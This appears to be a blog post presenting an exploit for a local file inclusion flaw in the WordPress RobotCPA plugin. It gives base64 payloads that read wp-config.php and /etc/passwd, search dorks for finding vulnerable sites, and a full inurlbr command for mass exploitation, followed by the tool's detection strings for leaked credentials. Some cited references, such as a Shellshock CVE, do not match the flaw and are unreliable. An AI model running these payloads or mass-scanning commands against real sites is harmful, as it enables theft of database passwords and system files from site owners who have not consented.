Exploring theme Plugin RobotCPA V5 CMS wordpress
Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Acess: https://www.exploit-db.com/exploits/37252/
The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.
POC:
string exploit:
php://filter/resource=./../../../wp-config.php
base64: cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==
string exploit:
file:///etc/passwd
base64:
ZmlsZTovLy9ldGMvcGFzc3dk
Exemple Injetion:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}
Mass exploitation with inurlbr
using get exploration parameters and scanner internal encoder
Exemple:
--exploit-get {you_get}
--exploit-get "&index.php?id=10'´0x27"
base64 Encrypt values in base64.
Example: base64({value})
Usage: base64(102030)
Usage: --exploit-get 'user?id=base64(102030)'
Let's use:
--exploit-get "&l=base64(file:///etc/passwd)"
or
--exploit-get "&l=base64(php://filter/resource=./../../../wp-config.php)"
Dork:
inurl:"/wp-content/plugins/robotcpa/"
inurl:"plugins/robotcpa/f.php?l="
Complete command
php inurlbr.php --dork 'inurl:"plugins/robotcpa/f.php?l="' --exploit-get "&l=base64(file:///etc/passwd)" -s vuln.txt -q 1,2,3,64
Internal validation script inurlbr
Exploring the server password file...
LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
Finding any of these values the script alert as vulnerable.
Exploring the server wp-config.php file...
CMS WORDPRESS
As the name suggests, if the web application doesn’t check the file name required by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary File Download vulnerability file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
Finding any of these values the script alert as vulnerable.
OUTPUT:
Download:
http://github.com/googleinurl/SCANNER-INURLBR
Nenhum comentário:
Postar um comentário
............